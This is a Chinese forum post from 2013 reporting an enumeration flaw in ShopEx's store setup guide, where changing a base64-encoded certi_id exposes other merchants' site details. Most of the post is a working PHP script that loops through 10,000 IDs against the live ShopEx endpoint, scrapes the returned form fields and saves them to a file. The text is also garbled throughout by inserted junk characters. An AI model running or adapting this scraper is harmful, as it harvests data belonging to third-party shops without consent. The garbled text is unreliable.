|
|
简要描述:& U& p' v0 ]' S; r, M4 e7 t
ShopEx某接口缺陷,可遍历所有网站$ |3 }, S+ K n& }% f5 Z; v# a
详细说明:, R* c3 ]! I7 n- \2 |" \/ ?
问题出现在shopex 网店使用向导页面 ) i/ N" ]" r, O2 f( i
4 O) M% d. K% e# |* C' Y
$ `/ v# c6 m* F q1 s* a7 e) O- M( i
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
" k) F) B A4 M8 @9 M
2 r1 l1 `' _+ |; C9 S1 r" d$ T
: J% z+ I; S: R- W, f" a% {! P: g' W
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}$ f/ h2 y$ q4 b
, w) U& [4 v) p% U
, l Y( ?: V: h: O) e
& J, V) I: c) y! G( n0 f1 g' r我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 8 }( X( t# r, T0 b
) h( w! N& m8 w& `/ H6 f
8 X/ U4 ?& y" W5 G; h8 }
" l$ U% t, A& G/ W% b: t7 g% c: O4 M
<?php
( K0 h, j* k6 h; w! M
8 q0 c8 c& a) @$ p8 y& z6 t for ($i=1; $i < 10000; $i++) { //遍历4 L( N% \$ Y! N% q; b
& H2 P, ^" B, [/ ^& x$ F* |6 s ShowshopExD($i);
' e4 s0 [, \ u% O( O9 \( b0 Y+ R' u+ L6 j3 w: A8 W; o
}
- u f# I* O0 Y( a8 w V v9 t( ]9 v. P) D4 t, V5 U2 E
function ShowshopExD($cid) {3 {/ m) D0 h5 e! S2 N$ ?1 V! w
( q" y4 X1 G: o* L5 ~5 o9 L
$url='http://guide.ecos.shopex.cn/step2.php';) U! f& B W/ E) [
* A4 V( c& B3 }% ^
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
; u' k: Y' u. b) s2 T; t. T6 _1 L
$url = $url.'?refer='.$refer;
! w% m8 ]# K/ C0 L
+ C) \. y4 t( d/ [" u3 K. ~ $ch = curl_init($url);
5 H* F# C- B1 V8 }/ U1 |- l: Y2 @) Y$ E0 K
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;( U2 l# [: F x& d: R) x* [
! s' r' w3 V _' |$ c0 b/ q
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
9 J3 I u' |1 k* u4 k, B K1 {$ a0 V, N/ d9 d* ~" n
$result = curl_exec($ch);
) O( R9 e) }# v( Z2 O
! ~* b& ?0 i) U' d9 g4 R3 P( m $result = mb_convert_encoding($result, "gb2312", "UTF-8");5 i% |9 ~; {: l2 s
0 v k6 {; M5 O- C" ?
if(strpos($result,$refer))
) F! w6 v3 T7 Y7 N" Q( W1 k! s# I# t& F6 M* @
{
K, `2 r' Z; p' Z; h
' w8 N8 |2 X f $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
0 B$ k% _% f" [, r3 z" o) w) H, O5 p3 E; F
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
# D# a6 q M* n) Z) b" q* ~1 v6 Q" x4 b$ X! }
foreach ($value[1] as $key) {
( L8 u" L9 O1 [2 B1 ^
/ A* [6 U6 I, p8 Z/ [% S8 J preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);3 C$ P2 g% G3 z& _! l( P: v
8 m6 |$ C# V* G5 M0 q
echo $res[1][0].':'.$res[3][0]."\r\n";8 I0 K8 ?$ m/ K- u0 |
3 l: L$ j$ J' A3 m. n( i/ A$ F6 ` $col =$res[1][0].':'.$res[3][0]."\r\n"; , q; m" d/ I% N; m8 f) p% I
3 [8 V: Z( G6 Q; V5 N" L
fwrite($fp, $col, strlen($col)); 2 A. k8 s1 d/ R8 z. A9 P# v' u
* [' J! e2 G, R! r: Q6 f
}
& y, O6 a' ?' l! a& i
P1 W$ Q8 {( M/ J, Y! I6 E6 F echo '--------------------------------'."\r\n";
: C& D3 y& N5 E% W% n* C* ~( D$ T6 F. ?5 Y# {8 N; d; J' j
fclose($fp); 2 J! e. [& b( {) M" D- j/ m
$ x) q: J; `3 n9 J. {6 x. X6 t% e* M* Y, Y }
5 V, h) c- z, L \
( m0 J) Z) w2 C2 L; ^ flush();
" C5 K! x4 Y. E/ o D. y0 Q. C1 Q
curl_close($ch);" T9 Y& J, b8 x2 W' q3 A
! C& q/ w+ D& |) R
}2 g1 U' N, ]( [ |5 ?
- i* V% v& N9 T/ x, v! [0 t?>! O, C2 ^6 Z9 B( x
漏洞证明:% X/ e8 [+ [+ f8 u) C% L- \3 l" ?% }$ D
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
2 O6 C) ^1 `" D% Hrefer换成其他加密方式
- @( f: M) U3 ~" l( d |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对